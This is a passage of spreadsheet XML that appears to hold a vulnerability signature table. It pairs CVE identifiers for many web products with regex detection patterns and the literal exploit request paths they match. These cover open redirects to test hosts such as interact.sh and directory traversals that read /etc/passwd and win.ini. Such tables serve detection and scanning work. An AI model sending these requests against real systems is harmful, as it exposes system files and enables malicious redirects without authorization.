    <t>/admin/index.php?m=admin&amp;c=log&amp;a=table_json&amp;json=get&amp;soso_ok=1&amp;t=user_login_log&amp;page=1&amp;limit=10&amp;bsphptime=1600407394176&amp;soso_id=1&amp;soso=&amp;DESC=0</t>
  </si>
  <si>
    <t>.*?(?:/service/~iufo/com\.ufida\.web\.action\.ActionServlet\?TableSelectedID&amp;TreeSelectedID&amp;action=nc\.ui\.iufo\.release\.InfoReleaseAction&amp;method=createBBSRelease).*</t>
  </si>
  <si>
    <t>/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&amp;TreeSelectedID&amp;action=nc.ui.iufo.release.InfoReleaseAction&amp;method=createBBSRelease</t>
  </si>
  <si>
    <t>CVE-2024-20440</t>
  </si>
  <si>
    <t>.*?(?:/cslu/v1/var/logs/customer-cslu-lib-log\.log).*</t>
  </si>
  <si>
    <t>/cslu/v1/var/logs/customer-cslu-lib-log.log</t>
  </si>
  <si>
    <t>Grafana钉钉API</t>
  </si>
  <si>
    <t>CVE-2025-3415</t>
  </si>
  <si>
    <t>.*?(?:/api/alertmanager/grafana/config/api/v1/alerts).*</t>
  </si>
  <si>
    <t>/api/alertmanager/grafana/config/api/v1/alerts</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_booking&amp;controller=customer&amp;task=getUserData&amp;id=123).*</t>
  </si>
  <si>
    <t>/index.php?option=com_booking&amp;controller=customer&amp;task=getUserData&amp;id=123</t>
  </si>
  <si>
    <t>AWStats</t>
  </si>
  <si>
    <t>开放重定向</t>
  </si>
  <si>
    <t>CVE-2009-5020</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/awstats/awredir\.pl\?url=interact\.sh|/awstats/awredir\.pl\?url=interact\.sh).*</t>
  </si>
  <si>
    <t>/awstats/awredir.pl?url=interact.sh|/cgi-bin/awstats/awredir.pl?url=interact.sh</t>
  </si>
  <si>
    <t>TikiWikiCMS Groupware</t>
  </si>
  <si>
    <t>CVE-2012-5321</t>
  </si>
  <si>
    <t>.*?(?:/tiki-featured_link\.php\?type=f&amp;url=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/tiki-featured_link.php?type=f&amp;url=https://interact.sh</t>
  </si>
  <si>
    <t>Telaen</t>
  </si>
  <si>
    <t>CVE-2013-2621</t>
  </si>
  <si>
    <t>.*?(?:/telaen/redir\.php\?https://interact\.sh|/redir\.php\?https://interact\.sh).*</t>
  </si>
  <si>
    <t>/redir.php?https://interact.sh|/telaen/redir.php?https://interact.sh</t>
  </si>
  <si>
    <t>Kaseya Virtual System Administrator</t>
  </si>
  <si>
    <t>CVE-2015-2863</t>
  </si>
  <si>
    <t>.*?(?:/vsaPres/Web20/core/LocalProxy\.ashx\?url=http://oast\.me|/inc/supportLoad\.asp\?urlToLoad=http://oast\.me).*</t>
  </si>
  <si>
    <t>/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me|/inc/supportLoad.asp?urlToLoad=http://oast.me</t>
  </si>
  <si>
    <t>CVE-2015-7823</t>
  </si>
  <si>
    <t>.*?(?:/CMSPages/GetDocLink\.ashx\?link=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/CMSPages/GetDocLink.ashx?link=https://interact.sh/</t>
  </si>
  <si>
    <t>Novius OS</t>
  </si>
  <si>
    <t>CVE-2015-5354</t>
  </si>
  <si>
    <t>.*?(?:/novius-os/admin/nos/login\?redirect=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/novius-os/admin/nos/login?redirect=http://interact.sh</t>
  </si>
  <si>
    <t>Xsuite</t>
  </si>
  <si>
    <t>CVE-2015-4668</t>
  </si>
  <si>
    <t>.*?(?:/openwin\.php\?redirurl=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/openwin.php?redirurl=http://interact.sh</t>
  </si>
  <si>
    <t>Odoo</t>
  </si>
  <si>
    <t>CVE-2017-5871</t>
  </si>
  <si>
    <t>.*?(?:/web/session/logout\?redirect=https%3a%2f%2foast\.me%2f|/web/dbredirect\?redirect=https%3a%2f%2foast\.me%2f|/web/session/logout\?redirect=https://oast\.me).*</t>
  </si>
  <si>
    <t>/web/session/logout?redirect=https://oast.me|/web/session/logout?redirect=https%3a%2f%2foast.me%2f|/web/dbredirect?redirect=https%3a%2f%2foast.me%2f</t>
  </si>
  <si>
    <t xml:space="preserve">Oracle </t>
  </si>
  <si>
    <t>CVE-2017-3528</t>
  </si>
  <si>
    <t>.*?(?:/OA_HTML/cabo/jsps/a\.jsp\?_t=fredRC&amp;configName=&amp;redirect=%2f%5cinteract\.sh).*</t>
  </si>
  <si>
    <t>/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&amp;configName=&amp;redirect=%2f%5cinteract.sh</t>
  </si>
  <si>
    <t>DotCMS</t>
  </si>
  <si>
    <t>CVE-2018-17422</t>
  </si>
  <si>
    <t>.*?(?:/html/portlet/ext/common/page_preview_popup\.jsp\?hostname=oast\.me|/html/common/forward_js\.jsp\?FORWARD_URL=http://oast\.me).*</t>
  </si>
  <si>
    <t>/html/common/forward_js.jsp?FORWARD_URL=http://oast.me|/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me</t>
  </si>
  <si>
    <t>Eventum</t>
  </si>
  <si>
    <t>CVE-2018-16761</t>
  </si>
  <si>
    <t>.*?(?:/clock_status\.php\?current_page=http://interact\.sh|/select_project\.php\?url=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/select_project.php?url=http://interact.sh|/clock_status.php?current_page=http://interact.sh</t>
  </si>
  <si>
    <t>Seagate NAS OS</t>
  </si>
  <si>
    <t>CVE-2018-12300</t>
  </si>
  <si>
    <t>.*?(?:/echo-server\.html\?code=test&amp;state=http://www\.interact\.sh#).*</t>
  </si>
  <si>
    <t>/echo-server.html?code=test&amp;state=http://www.interact.sh#</t>
  </si>
  <si>
    <t>Babel</t>
  </si>
  <si>
    <t>CVE-2019-1010290</t>
  </si>
  <si>
    <t>.*?(?:/modules/babel/redirect\.php\?newurl=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/modules/babel/redirect.php?newurl=http://interact.sh</t>
  </si>
  <si>
    <t>LabKey Server Community Edition</t>
  </si>
  <si>
    <t>CVE-2019-3912</t>
  </si>
  <si>
    <t>.*?(?:/labkey/__r1/login-login\.view\?returnUrl=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/labkey/__r1/login-login.view?returnUrl=http://interact.sh</t>
  </si>
  <si>
    <t>Smartstore</t>
  </si>
  <si>
    <t>CVE-2020-36365</t>
  </si>
  <si>
    <t>.*?(?:/backend/admin/common/clearcache\?previousUrl=http://www\.interact\.sh).*</t>
  </si>
  <si>
    <t>/backend/admin/common/clearcache?previousUrl=http://www.interact.sh</t>
  </si>
  <si>
    <t>EyouCMS Open Redirect</t>
  </si>
  <si>
    <t>CVE-2021-39501</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?m=user&amp;c=Users&amp;a=logout&amp;referurl=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/index.php?m=user&amp;c=Users&amp;a=logout&amp;referurl=https://interact.sh</t>
  </si>
  <si>
    <t>CVE-2021-36580</t>
  </si>
  <si>
    <t>.*?(?:/webmail/basic/\?referer=https://interact\.sh&amp;_c=auth&amp;ctz=120&amp;signup_password=&amp;_a%5bsignup%5d=1).*</t>
  </si>
  <si>
    <t>/webmail/basic/?referer=https://interact.sh&amp;_c=auth&amp;ctz=120&amp;signup_password=&amp;_a%5bsignup%5d=1</t>
  </si>
  <si>
    <t>Noptin</t>
  </si>
  <si>
    <t>CVE-2021-25033</t>
  </si>
  <si>
    <t>.*?(?:/\?noptin_ns=email_click&amp;to=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/?noptin_ns=email_click&amp;to=https://interact.sh</t>
  </si>
  <si>
    <t>CVE-2021-24288</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?page=acymailing_front&amp;ctrl=frontusers&amp;noheader=1&amp;user\[email\]=example@mail\.com&amp;ctrl=frontusers&amp;task=subscribe&amp;option=acymailing&amp;redirect=https://interact\.sh&amp;ajax=0&amp;acy_source=widget%202&amp;hiddenlists=1&amp;acyformname=formAcym93841&amp;acysubmode=widget_acym).*</t>
  </si>
  <si>
    <t>/index.php?page=acymailing_front&amp;ctrl=frontusers&amp;noheader=1&amp;user[email]=example@mail.com&amp;ctrl=frontusers&amp;task=subscribe&amp;option=acymailing&amp;redirect=https://interact.sh&amp;ajax=0&amp;acy_source=widget%202&amp;hiddenlists=1&amp;acyformname=formAcym93841&amp;acysubmode=widget_acym</t>
  </si>
  <si>
    <t>CVE-2021-24838</t>
  </si>
  <si>
    <t>.*?(?:/wp-json/anycomment/v1/auth/wordpress\?redirect=https://interact\.sh\?a=https://interact\.sh|/wp-json/anycomment/v1/auth/wordpress\?redirect=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh|/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh</t>
  </si>
  <si>
    <t>CVE-2021-25111</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=heartbeat&amp;admin_custom_language_toggle=1&amp;admin_custom_language_return_url=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=heartbeat&amp;admin_custom_language_toggle=1&amp;admin_custom_language_return_url=https://interact.sh</t>
  </si>
  <si>
    <t>CVE-2021-25028</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin\.php\?page=wp_ajax_rsvp-form&amp;tribe_tickets_redirect_to=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=wp_ajax_rsvp-form&amp;tribe_tickets_redirect_to=https://interact.sh</t>
  </si>
  <si>
    <t>CVE-2021-24406</t>
  </si>
  <si>
    <t>.*?(?:/community/\?foro=signin&amp;redirect_to=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/community/?foro=signin&amp;redirect_to=https://interact.sh/</t>
  </si>
  <si>
    <t>ILIAS eLearning</t>
  </si>
  <si>
    <t>CVE-2022-45917</t>
  </si>
  <si>
    <t>.*?(?:/ilias/shib_logout\.php\?action=logout&amp;return=https://oast\.me|/shib_logout\.php\?action=logout&amp;return=https://oast\.me).*</t>
  </si>
  <si>
    <t>/ilias/shib_logout.php?action=logout&amp;return=https://oast.me|/shib_logout.php?action=logout&amp;return=https://oast.me</t>
  </si>
  <si>
    <t>CVE-2022-0165</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=kc_get_thumbn&amp;id=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=kc_get_thumbn&amp;id=https://interact.sh</t>
  </si>
  <si>
    <t>BlogEngineCMS</t>
  </si>
  <si>
    <t>CVE-2023-33405</t>
  </si>
  <si>
    <t>.*?(?:/default\.aspx\?years=http://oast\.pro).*</t>
  </si>
  <si>
    <t>/default.aspx?years=http://oast.pro</t>
  </si>
  <si>
    <t>CVE-2023-40779</t>
  </si>
  <si>
    <t>.*?(?:/%5coast\.pro/%2f%2e%2e).*</t>
  </si>
  <si>
    <t>/%5coast.pro/%2f%2e%2e</t>
  </si>
  <si>
    <t>Mosparo</t>
  </si>
  <si>
    <t>CVE-2023-5375</t>
  </si>
  <si>
    <t>.*?(?:/project/switch/1\?targetPath=http://oast\.pro).*</t>
  </si>
  <si>
    <t>/project/switch/1?targetPath=http://oast.pro</t>
  </si>
  <si>
    <t xml:space="preserve">OpenCMS </t>
  </si>
  <si>
    <t>CVE-2023-6380</t>
  </si>
  <si>
    <t>.*?(?:/system/modules/alkacon\.mercury\.template\.jsondemo/elements/jsonapi\.jsp\?content&amp;fallbackLocale&amp;locale=en&amp;rows=1&amp;uri=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&amp;fallbackLocale&amp;locale=en&amp;rows=1&amp;uri=http://interact.sh</t>
  </si>
  <si>
    <t>Payment Gateway</t>
  </si>
  <si>
    <t>CVE-2023-6786</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin\.php\?page=wc-settings&amp;action=redirect_telcell_form&amp;api_url=https://oast\.me).*</t>
  </si>
  <si>
    <t>/wp-admin/admin.php?page=wc-settings&amp;action=redirect_telcell_form&amp;api_url=https://oast.me</t>
  </si>
  <si>
    <t>CVE-2023-0552</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin\?piereg_logout_url=true&amp;redirect_to=https://oast\.me).*</t>
  </si>
  <si>
    <t>/wp-admin?piereg_logout_url=true&amp;redirect_to=https://oast.me</t>
  </si>
  <si>
    <t>CVE-2023-29204</t>
  </si>
  <si>
    <t>.*?(?:/bin/login/XWiki/XWikiLogin\?xredirect=http:/www\.oast\.me|/bin/login/XWiki/XWikiLogin\?xredirect=//www\.oast\.me).*\|.*?(?:/bin/login/XWiki/XWikiLogin\?xredirect=//oast\.me).*</t>
  </si>
  <si>
    <t>/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me|/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me\|/bin/login/XWiki/XWikiLogin?xredirect=//oast.me</t>
  </si>
  <si>
    <t>BentoML</t>
  </si>
  <si>
    <t>CVE-2024-12760</t>
  </si>
  <si>
    <t>.*?(?:/ui/gradio_api/file=https://oast\.me).*</t>
  </si>
  <si>
    <t>/ui/gradio_api/file=https://oast.me</t>
  </si>
  <si>
    <t>Keycloak</t>
  </si>
  <si>
    <t>CVE-2024-8883</t>
  </si>
  <si>
    <t>.*?(?:/realms/master/protocol/openid-connect/auth\?client_id=.*?&amp;redirect_uri=.*?:80@.*?).*</t>
  </si>
  <si>
    <t>/realms/master/protocol/openid-connect/auth?client_id={{client_id}}&amp;redirect_uri={{redir_host}}:80@{{redirect_uri}}</t>
  </si>
  <si>
    <t>Travelpayouts</t>
  </si>
  <si>
    <t>CVE-2024-0337</t>
  </si>
  <si>
    <t>.*?(?:/\?travelpayouts_redirect=https://oast\.me).*</t>
  </si>
  <si>
    <t>/?travelpayouts_redirect=https://oast.me</t>
  </si>
  <si>
    <t>.*?(?:/plus/download\.php\?open=1&amp;link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==).*</t>
  </si>
  <si>
    <t>/plus/download.php?open=1&amp;link=aHR0cHM6Ly9pbnRlcmFjdC5zaA==</t>
  </si>
  <si>
    <t>Netsweeper</t>
  </si>
  <si>
    <t>.*?(?:/webadmin/authportal/bounce\.php\?url=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/webadmin/authportal/bounce.php?url=https://interact.sh/</t>
  </si>
  <si>
    <t>HomeAutomation</t>
  </si>
  <si>
    <t>.*?(?:/homeautomation_v3_3_2/api\.php\?do=groups/toggle&amp;groupid=1&amp;status=1&amp;redirect=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/homeautomation_v3_3_2/api.php?do=groups/toggle&amp;groupid=1&amp;status=1&amp;redirect=https://interact.sh/</t>
  </si>
  <si>
    <t>.*?(?:/_next/image\?url=//interact\.sh/&amp;q=100&amp;w=128&amp;h=128).*</t>
  </si>
  <si>
    <t>/_next/image?url=/\/\interact.sh/&amp;q=100&amp;w=128&amp;h=128</t>
  </si>
  <si>
    <t>OdooCMS</t>
  </si>
  <si>
    <t>.*?(?:/website/lang/en_US\?r=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/website/lang/en_US?r=https://interact.sh/</t>
  </si>
  <si>
    <t>Otobo</t>
  </si>
  <si>
    <t>.*?(?:/otobo/index\.pl\?Action=ExternalURLJump;URL=http://www\.interact\.sh).*</t>
  </si>
  <si>
    <t>/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh</t>
  </si>
  <si>
    <t>Thinkific</t>
  </si>
  <si>
    <t>.*?(?:/api/sso/v2/sso/jwt\?error_url=http://interact\.sh).*</t>
  </si>
  <si>
    <t>/api/sso/v2/sso/jwt?error_url=http://interact.sh</t>
  </si>
  <si>
    <t>Open Journal Systems pkp</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/index/user/setLocale/NEW_LOCALE\?source=@oast\.me).*</t>
  </si>
  <si>
    <t>/index.php/index/user/setLocale/NEW_LOCALE?source=@oast.me</t>
  </si>
  <si>
    <t>.*?(?:/\?aiowpsec_do_log_out=1&amp;after_logout=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/?aiowpsec_do_log_out=1&amp;after_logout=https://interact.sh</t>
  </si>
  <si>
    <t>.*?(?:/\?piereg_logout_url=true&amp;redirect_to=https://interact\.sh).*</t>
  </si>
  <si>
    <t>/?piereg_logout_url=true&amp;redirect_to=https://interact.sh</t>
  </si>
  <si>
    <t>.*?(?:/\?wptouch_switch=desktop&amp;redirect=http://interact\.sh).*\|.*?(?:/\?wptouch_switch=desktop&amp;redirect=https://interact\.sh/).*</t>
  </si>
  <si>
    <t>/?wptouch_switch=desktop&amp;redirect=http://interact.sh\|/?wptouch_switch=desktop&amp;redirect=https://interact.sh/</t>
  </si>
  <si>
    <t>WebGlimpse</t>
  </si>
  <si>
    <t>目录遍历</t>
  </si>
  <si>
    <t>CVE-2009-5114</t>
  </si>
  <si>
    <t>.*?(?:/wgarcmin\.cgi\?NEXTPAGE=D&amp;ID=1&amp;DOC=\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/wgarcmin.cgi?NEXTPAGE=D&amp;ID=1&amp;DOC=../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-2037</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_perchadownloadsattach&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_perchadownloadsattach&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2036</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_perchafieldsattach&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_perchafieldsattach&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2035</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_perchagallery&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_perchagallery&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2034</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_perchaimageattach&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_perchaimageattach&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1540</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_myblog&amp;Itemid=1&amp;task=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_myblog&amp;Itemid=1&amp;task=../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0943</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jashowcase&amp;view=jashowcase&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jashowcase&amp;view=jashowcase&amp;controller=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0944</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jcollection&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jcollection&amp;controller=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0942</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jvideodirect&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jvideodirect&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>phpShowtime</t>
  </si>
  <si>
    <t>CVE-2010-4282</t>
  </si>
  <si>
    <t>.*?(?:/pandora_console/ajax\.php\?page=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/pandora_console/ajax.php?page=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2011-3315</t>
  </si>
  <si>
    <t>.*?(?:/ccmivr/IVRGetAudioFile\.do\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Majordomo</t>
  </si>
  <si>
    <t>CVE-2011-0049</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/mj_wwwusr\?passw=&amp;list=GLOBAL&amp;user=&amp;func=help&amp;extra=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/cgi-bin/mj_wwwusr?passw=&amp;list=GLOBAL&amp;user=&amp;func=help&amp;extra=/../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Axigen Mail Server</t>
  </si>
  <si>
    <t>CVE-2012-4940</t>
  </si>
  <si>
    <t>.*?(?:/source/loggin/page_log_dwn_file\.hsp\?h=44ea8a6603cbf54e245f37b4ddaf8f36&amp;action=download&amp;fileName=\.\..\..\.windowswin\.ini|/\?h=44ea8a6603cbf54e245f37b4ddaf8f36&amp;page=vlf&amp;action=edit&amp;fileName=\.\..\..\.windowswin\.ini).*</t>
  </si>
  <si>
    <t>/?h=44ea8a6603cbf54e245f37b4ddaf8f36&amp;page=vlf&amp;action=edit&amp;fileName=..\..\..\windows\win.ini|/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&amp;action=download&amp;fileName=..\..\..\windows\win.ini</t>
  </si>
  <si>
    <t>Dolibarr ERP/CRM Alpha</t>
  </si>
  <si>
    <t>CVE-2012-1226</t>
  </si>
  <si>
    <t>.*?(?:/document\.php\?modulepart=project&amp;file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/document.php?modulepart=project&amp;file=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>FlatnuXCMS</t>
  </si>
  <si>
    <t>CVE-2012-4878</t>
  </si>
  <si>
    <t>.*?(?:/controlcenter\.php\?opt=contents/Files&amp;dir=%2Fetc&amp;ffile=passwd&amp;opmod=open).*</t>
  </si>
  <si>
    <t>/controlcenter.php?opt=contents/Files&amp;dir=%2Fetc&amp;ffile=passwd&amp;opmod=open</t>
  </si>
  <si>
    <t>MySQLDumper</t>
  </si>
  <si>
    <t>CVE-2012-4253</t>
  </si>
  <si>
    <t>.*?(?:/learn/cubemail/filemanagement\.php\?action=dl&amp;f=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/learn/cubemail/filemanagement.php?action=dl&amp;f=../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2012-0981</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?r=i/\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?r=i/../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2013-5528</t>
  </si>
  <si>
    <t>.*?(?:/ccmadmin/bulkvivewfilecontents\.do\?filetype=samplefile&amp;fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&amp;fileName=../../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Xibo</t>
  </si>
  <si>
    <t>CVE-2013-5979</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?p=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00index&amp;q=About&amp;ajax=true&amp;_=1355714673828).*</t>
  </si>
  <si>
    <t>/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&amp;q=About&amp;ajax=true&amp;_=1355714673828</t>
  </si>
  <si>
    <t>DomPHP</t>
  </si>
  <si>
    <t>CVE-2014-10037</t>
  </si>
  <si>
    <t>.*?(?:/photoalbum/index\.php\?urlancien=&amp;url=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/photoalbum/index.php?urlancien=&amp;url=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2014-9609</t>
  </si>
  <si>
    <t>.*?(?:/webadmin/reporter/view_server_log\.php\?act=stats&amp;filename=log&amp;offset=1&amp;count=1&amp;sortorder=0&amp;filter=0&amp;log=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/webadmin/reporter/view_server_log.php?act=stats&amp;filename=log&amp;offset=1&amp;count=1&amp;sortorder=0&amp;filter=0&amp;log=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>webEdition</t>
  </si>
  <si>
    <t>CVE-2014-5258</t>
  </si>
  <si>
    <t>.*?(?:/webEdition/showTempFile\.php\?file=\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/webEdition/showTempFile.php?file=../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2015-1503</t>
  </si>
  <si>
    <t>.*?(?:/webmail/old/calendar/minimizer/index\.php\?script=\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2fetc%2fpasswd|/webmail/old/calendar/minimizer/index\.php\?style=\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2f\.\.\.%2f\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd|/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>Koha</t>
  </si>
  <si>
    <t>CVE-2015-4632</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/koha/svc/virtualshelves/search\?template_path=\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2f\.\.%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>CVE-2015-2067</t>
  </si>
  <si>
    <t>.*?(?:/magmi/web/ajax_pluginconf\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;plugintype=utilities&amp;pluginclass=CustomSQLUtility).*</t>
  </si>
  <si>
    <t>/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&amp;plugintype=utilities&amp;pluginclass=CustomSQLUtility</t>
  </si>
  <si>
    <t>Eaton Intelligent Power Manager</t>
  </si>
  <si>
    <t>CVE-2018-12031</t>
  </si>
  <si>
    <t>.*?(?:/server/node_upgrade_srv\.js\?action=downloadFirmware&amp;firmware=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./Windows/win\.ini|/server/node_upgrade_srv\.js\?action=downloadFirmware&amp;firmware=/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/server/node_upgrade_srv.js?action=downloadFirmware&amp;firmware=/../../../../../../../../../../etc/passwd|/server/node_upgrade_srv.js?action=downloadFirmware&amp;firmware=/../../../../../../../../../../Windows/win.ini</t>
  </si>
  <si>
    <t>NCBI ToolBox</t>
  </si>
  <si>
    <t>CVE-2018-16716</t>
  </si>
  <si>
    <t>.*?(?:/blast/nph-viewgif\.cgi\?\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/blast/nph-viewgif.cgi?../../../../etc/passwd</t>
  </si>
  <si>
    <t>RubedoCMS</t>
  </si>
  <si>
    <t>CVE-2018-16836</t>
  </si>
  <si>
